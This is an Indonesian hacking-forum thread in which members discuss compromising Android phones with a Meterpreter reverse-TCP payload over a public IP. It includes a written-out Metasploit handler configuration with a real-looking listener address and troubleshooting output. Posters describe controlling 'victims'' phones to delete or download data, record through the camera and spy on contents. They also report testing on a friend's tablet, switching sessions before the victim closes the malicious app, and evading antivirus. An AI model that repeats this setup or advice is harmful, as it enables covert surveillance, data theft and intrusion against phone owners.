[Share] Exploit Android Meterpreter IP Public
#21
mantaf ne sharenya Big Grin izin praktek ya om!

#22
(03-27-2014, 01:26 PM)crash ahan Wrote: mantaf ne sharenya Big Grin izin praktek ya om!

siap, silahkan om :-bd
Information Is The Most Dangerous Weapon In The World

#23
(01-15-2014, 10:30 AM)sonyrimawan Wrote: @Abdul Khaliq thanks om. semoga bermanfaat Big Grin
@alkaaf bahh =)) ini server punya kampus ane sendiri om Big Grin kagak boleh di bagi" =))
@./terrorattack setelah masuk meterpreter ibarat kita udah pegang hapenya sendiri om, kita bisa melakukan apa saja dengan android tersebut. mau di hapus, mau di download datanya, mau ngrekam lewat kamera, mau nyadap isi hapenya itu sesuka hati om Big Grin

wahhh...mantap y om..:-bd berati bsa mengontrol alur keluar masuk juga y om..? klo umpan di lepas lewat mms gmana om ? jd target lebih spesifik gtu... Smile

#24
om, ane nanya dikit. klo hp android yg kita exploit belum di root apakah kita tetap bisa mengakses hp korban? soalnya kebanyakan untuk pemegang hp android pemula systemnya msh belum di root yg artinya punya keterbatasan hak akses, sedangkan di perintah meterpreter syntaxnya hampir ke system semua. mungkin om bs jelasin ke ane sedikit Big Grin

#25
(04-16-2014, 04:12 PM)kyoshiro67 Wrote: om, ane nanya dikit. klo hp android yg kita exploit belum di root apakah kita tetap bisa mengakses hp korban? soalnya kebanyakan untuk pemegang hp android pemula systemnya msh belum di root yg artinya punya keterbatasan hak akses, sedangkan di perintah meterpreter syntaxnya hampir ke system semua. mungkin om bs jelasin ke ane sedikit Big Grin

bisa kok om meskipun belum di root sama si korban
kmren tested di tab temen
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#26
(04-14-2014, 01:13 PM)checkpoint Wrote:
(01-15-2014, 10:30 AM)sonyrimawan Wrote: @Abdul Khaliq thanks om. semoga bermanfaat Big Grin
@alkaaf bahh =)) ini server punya kampus ane sendiri om Big Grin kagak boleh di bagi" =))
@./terrorattack setelah masuk meterpreter ibarat kita udah pegang hapenya sendiri om, kita bisa melakukan apa saja dengan android tersebut. mau di hapus, mau di download datanya, mau ngrekam lewat kamera, mau nyadap isi hapenya itu sesuka hati om Big Grin

wahhh...mantap y om..:-bd berati bsa mengontrol alur keluar masuk juga y om..? klo umpan di lepas lewat mms gmana om ? jd target lebih spesifik gtu... Smile

wwew maksudnya di lepas lewat mms gimana om ane kurang paham ama pertanyaannya Big Grin jadi gini kalau untuk praktek ke lapangan, setelah dapat meterpreter, langsung pindah seasion yang aktif karena kemungkinan aplikasi berupa virus yang dia buka akan langsung di tutup makanya kita harus pindah ke sesion lain Wink

(04-17-2014, 11:04 AM)wine trochanter Wrote:
(04-16-2014, 04:12 PM)kyoshiro67 Wrote: om, ane nanya dikit. klo hp android yg kita exploit belum di root apakah kita tetap bisa mengakses hp korban? soalnya kebanyakan untuk pemegang hp android pemula systemnya msh belum di root yg artinya punya keterbatasan hak akses, sedangkan di perintah meterpreter syntaxnya hampir ke system semua. mungkin om bs jelasin ke ane sedikit Big Grin

bisa kok om meskipun belum di root sama si korban
kmren tested di tab temen

yups bener sekali kata om wine, android yang udah di root pun tetap bisa di kena exploit. \m/
Information Is The Most Dangerous Weapon In The World

#27
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 95.128.181.59
lhost => 95.128.181.59
msf exploit(handler) > set lport 123
lport => 123
msf exploit(handler) > exploit

[-] Handler failed to bind to 95.xxx.xxx.xx:123
[*] Started reverse handler on 0.0.0.0:123
[*] Starting the payload handler...

Kalo failed gitu gimana om ? Big Grin
mohon pencerahannya Big Grin

#28
(04-19-2014, 02:00 AM)eMJe009 Wrote: msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 95.128.181.59
lhost => 95.128.181.59
msf exploit(handler) > set lport 123
lport => 123
msf exploit(handler) > exploit

[-] Handler failed to bind to 95.xxx.xxx.xx:123
[*] Started reverse handler on 0.0.0.0:123
[*] Starting the payload handler...

Kalo failed gitu gimana om ? Big Grin
mohon pencerahannya Big Grin

failednya notifikasinya bagaimana? coba ketahui dulu apakah korban menggunakan antivirus di androidnya. soalnya itu payload masih telanjang belum di enkripsi jadi di antivirus masih ketahuan.
Information Is The Most Dangerous Weapon In The World

#29
(04-19-2014, 06:28 PM)sonyrimawan Wrote:
(04-19-2014, 02:00 AM)eMJe009 Wrote: msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 95.128.181.59
lhost => 95.128.181.59
msf exploit(handler) > set lport 123
lport => 123
msf exploit(handler) > exploit

[-] Handler failed to bind to 95.xxx.xxx.xx:123
[*] Started reverse handler on 0.0.0.0:123
[*] Starting the payload handler...

Kalo failed gitu gimana om ? Big Grin
mohon pencerahannya Big Grin

failednya notifikasinya bagaimana? coba ketahui dulu apakah korban menggunakan antivirus di androidnya. soalnya itu payload masih telanjang belum di enkripsi jadi di antivirus masih ketahuan.

failed pas jalanin exploitnya Big Grin
[-] Handler failed to bind to 95.xxx.xxx.xx:123
Udah gini aja :v

#30
(04-19-2014, 07:14 PM)eMJe009 Wrote:
(04-19-2014, 06:28 PM)sonyrimawan Wrote:
(04-19-2014, 02:00 AM)eMJe009 Wrote: msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 95.128.181.59
lhost => 95.128.181.59
msf exploit(handler) > set lport 123
lport => 123
msf exploit(handler) > exploit

[-] Handler failed to bind to 95.xxx.xxx.xx:123
[*] Started reverse handler on 0.0.0.0:123
[*] Starting the payload handler...

Kalo failed gitu gimana om ? Big Grin
mohon pencerahannya Big Grin

failednya notifikasinya bagaimana? coba ketahui dulu apakah korban menggunakan antivirus di androidnya. soalnya itu payload masih telanjang belum di enkripsi jadi di antivirus masih ketahuan.

failed pas jalanin exploitnya Big Grin
[-] Handler failed to bind to 95.xxx.xxx.xx:123

emang gtu kok kalo ane om, tp klo udh di eksekusi sama korban langsung kebuka sesi meterpreter nya Big Grin
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix





Users browsing this thread: 1 Guest(s)